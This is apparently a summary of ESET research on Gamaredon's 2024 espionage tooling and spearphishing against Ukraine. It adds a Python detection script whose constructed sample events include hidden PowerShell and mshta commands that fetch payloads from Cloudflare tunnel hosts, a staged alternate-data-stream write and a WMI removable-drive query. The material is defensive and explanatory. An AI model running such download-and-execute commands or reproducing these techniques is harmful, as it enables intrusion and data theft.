Gamaredon 2024: Stealthier Phishing Against Ukraine

July 2, 2025 at 12:00 AM

ESET Research details how Russia-aligned APT Gamaredon intensified cyberespionage against Ukraine in 2024, modernizing its toolkit, scaling spearphishing, and concealing nearly all command-and-control (C2) traffic behind Cloudflare tunnels.

Highlights

  • Exclusive focus on Ukrainian government targets; prior NATO probing dropped.
  • Larger, more frequent spearphishing waves delivering HTA/LNK via RAR/ZIP/7z or XHTML (HTML smuggling). October saw rare hyperlink-only lures and LNKs that execute PowerShell from Cloudflare-generated domains.
  • Six new tools aimed at stealth, persistence, and lateral movement.
  • Major upgrades to core tools, boosting obfuscation, registry-only storage, and USB/network drive weaponization.
  • Heavy reliance on third-party services (Telegram, Telegraph, Cloudflare, Dropbox) and DNS-over-HTTPS to shield C2.

New tools in 2024

  • PteroDespair: Short-lived PowerShell recon to gather diagnostics from deployed malware.
  • PteroTickle: PowerShell weaponizer that targets Python apps converted to executables, abusing Tcl/Tk components to move laterally.
  • PteroGraphin: PowerShell payload channel using Telegraph API; initial Excel add-in persistence later simplified to scheduled tasks.
  • PteroStew: VBScript downloader that hides code in NTFS alternate data streams.
  • PteroQuark: New VBScript downloader component within the VBScript PteroLNK chain.
  • PteroBox: PowerShell file stealer using WMI event subscriptions to detect USBs and exfiltrate to Dropbox while avoiding duplicates.

Upgrades to existing tools

  • PteroPSDoor: Switches to FileSystemWatcher and WMI events for stealthy collection and USB detection; code stored in registry keys only.
  • PteroLNK (VBScript): Now weaponizes mapped network drives alongside USBs; better obfuscation, more complex LNK creation, and registry tricks to hide files/extensions.
  • PteroVDoor: Adds external platforms (e.g., Codeberg) to dynamically distribute C2 details.
  • PteroPSLoad: Broad move back to Cloudflare tunnels, hiding most of the C2 estate behind Cloudflare subdomains.

Infrastructure and evasion

  • Fast-flux continues at a reduced scale; domains dropped from 500+ (2023) to ~200 (2024).
  • Third-party services (Telegram, Telegraph, Codeberg, Cloudflare) and DoH (Google, Cloudflare) help bypass domain blocks; operators also consult public resolver sites.
  • New tricks include dropping embedded HTA/VBS in temp folders to resolve C2 separately, complicating detection.
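As an added defender-side illustration (example code, not from ESET or the report), the script below runs three simple detection rules over constructed Sysmon-style events for behaviours summarised in the tool lists above: a script host launched with a Cloudflare quick-tunnel URL, a write to an NTFS alternate data stream, and a WMI event subscription watching for removable drives. The key=value event format, the sample events, and the assumption that "Cloudflare-generated domains" means *.trycloudflare.com hostnames are mine; event IDs follow Sysmon (1, 15, 19-21).

```python
import re
from typing import Dict, List

# Constructed, Sysmon-style sample events in key=value form, modelled on the
# behaviours summarised above. Illustrative only, not telemetry from the report.
SAMPLE_EVENTS = [
    "id=1 image=C:\\Windows\\System32\\mshta.exe parent=C:\\Windows\\explorer.exe cmdline=mshta https://quiet-lake.trycloudflare.com/index.hta",
    "id=1 image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe parent=C:\\Windows\\explorer.exe cmdline=powershell -w hidden -c iwr https://odd-name.trycloudflare.com/p",
    "id=15 image=C:\\Windows\\System32\\wscript.exe target=C:\\Users\\u\\AppData\\Local\\Temp\\readme.txt:stage2",
    "id=15 image=C:\\Program Files\\Browser\\browser.exe target=C:\\Users\\u\\Downloads\\doc.pdf:Zone.Identifier",
    "id=20 image=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe consumer=CommandLineEventConsumer query=SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_LogicalDisk' AND TargetInstance.DriveType = 2",
    "id=1 image=C:\\Windows\\System32\\notepad.exe parent=C:\\Windows\\explorer.exe cmdline=notepad report.txt",
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
TUNNEL_DOMAIN = ".trycloudflare.com"      # assumed: Cloudflare quick-tunnel hostnames
WMI_SUBSCRIPTION_IDS = {"19", "20", "21"}  # Sysmon: WMI filter / consumer / binding
BENIGN_STREAMS = {"Zone.Identifier"}       # mark-of-the-web, written by browsers

KV_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")

def parse_event(line: str) -> Dict[str, str]:
    """Split 'k=v k2=v2 ...' into a dict; values may contain spaces."""
    return dict(KV_RE.findall(line))

def classify(ev: Dict[str, str]) -> List[str]:
    """Return the names of the rules an event triggers (empty if benign)."""
    hits: List[str] = []
    image = ev.get("image", "").rsplit("\\", 1)[-1].lower()
    if ev.get("id") == "1" and image in SCRIPT_HOSTS and TUNNEL_DOMAIN in ev.get("cmdline", "").lower():
        hits.append("script_host_cloudflare_tunnel")
    if ev.get("id") == "15":
        # An ADS path carries a second ':' after the drive letter; skip MOTW noise.
        parts = ev.get("target", "").split(":")
        if len(parts) >= 3 and parts[2] not in BENIGN_STREAMS:
            hits.append("ads_write")
    if ev.get("id") in WMI_SUBSCRIPTION_IDS:
        hits.append("wmi_event_subscription")
        query = ev.get("query", "").lower()
        if "win32_logicaldisk" in query and "drivetype" in query:
            hits.append("wmi_removable_drive_watch")  # DriveType 2 = removable
    return hits

def scan(lines: List[str]) -> Dict[str, List[str]]:
    """Map each rule name to the raw events that triggered it."""
    findings: Dict[str, List[str]] = {}
    for line in lines:
        for rule in classify(parse_event(line)):
            findings.setdefault(rule, []).append(line)
    return findings

if __name__ == "__main__":
    for rule, events in scan(SAMPLE_EVENTS).items():
        print(f"{rule}: {len(events)} event(s)")
```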

Notable anomaly

  • Mid-2024, a one-off VBScript payload opened the Guardians of Odessa Telegram channel to spread pro-Russian propaganda, which is unusual for Gamaredon but was attributed with high confidence.

Outlook

Gamaredon remains a persistent, innovative threat to Ukrainian institutions. Expect continued spearphishing intensity, expanded lateral movement, and C2 concealment as the conflict endures.

Source: WeLiveSecurity